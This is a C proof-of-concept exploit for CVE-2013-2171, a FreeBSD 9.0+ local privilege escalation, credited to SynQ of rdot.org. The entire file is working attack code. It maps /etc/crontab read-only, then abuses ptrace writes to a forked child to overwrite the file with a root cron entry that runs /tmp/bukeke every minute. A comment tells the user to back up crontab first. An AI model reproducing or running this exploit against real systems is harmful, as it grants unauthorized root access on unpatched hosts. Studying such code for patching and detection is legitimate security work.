/*
* CVE-2013-2171 FreeBSD 9.0+ Privilege escalation via mmap
*
* poc by SynQ, rdot.org, 6/2013
*
* don't forget to cp /etc/crontab /tmp
*
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <sys/types.h>
char sc[]="*\t*\t*\t*\t*\troot\t/tmp/bukeke\n#";
void child() {
int status;
status = ptrace(PT_TRACE_ME, 0, 0, 0);
if (status != 0)
printf("child ptrace error\n");
exit(1);
}
int main() {
int pid, fd, i;
char *addr;
fd = open("/etc/crontab", O_RDONLY);
if (fd<0) {
printf("open failed\n");
exit(1);
}
addr = mmap(0, 4096, PROT_READ, MAP_SHARED, fd, 0);
if (addr == MAP_FAILED) {
printf("mmap fault\n");
exit(1);
}
pid = fork();
if (pid == -1) {
printf("fork failed\n");
exit(1);
}
else if (pid == 0)
child();
ptrace(PT_ATTACH, pid, 0, 0);
if (wait(0) == -1) {
printf("wait failed\n");
exit(1);
}
printf("writing shellcode...\n");
for(i=0; i < sizeof(sc)/4; i++)
ptrace(PT_WRITE_D, pid, addr+i*4, *(int*)&sc[i*4]);
ptrace(PT_DETACH, pid, 0, 0);
if (wait(0) == -1) {
printf("wait2 failed\n");
exit(1);
}
printf("done.\n");
return 0;
}